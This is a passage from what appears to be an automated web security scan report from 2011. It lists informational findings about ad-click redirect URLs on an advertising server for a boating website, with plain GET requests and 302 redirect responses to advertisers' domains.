Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.380. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/319855659/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/319855659/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/319855659/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/319855659/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.381. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/321743525/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/321743525/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/321743525/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/321743525/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.382. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/338106476/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/338106476/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/338106476/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/338106476/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:36:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.383. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/350884461/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/350884461/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/350884461/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/350884461/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.384. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/358188109/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/358188109/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/358188109/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/358188109/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.385. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/361144958/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/361144958/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/361144958/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/361144958/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.386. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/373221580/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/373221580/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/373221580/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/373221580/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.387. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/37601243/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/37601243/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/37601243/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/37601243/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.388. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:40:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.389. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386885083/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386885083/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386885083/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386885083/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.390. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/387825037/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/387825037/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/387825037/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/387825037/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.391. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/392919129/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/392919129/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/392919129/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.marinalife.com/soundings

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/392919129/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 311
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

20.392. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396828855/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396828855/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396828855/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396828855/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:40:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.393. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396936848/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396936848/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396936848/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

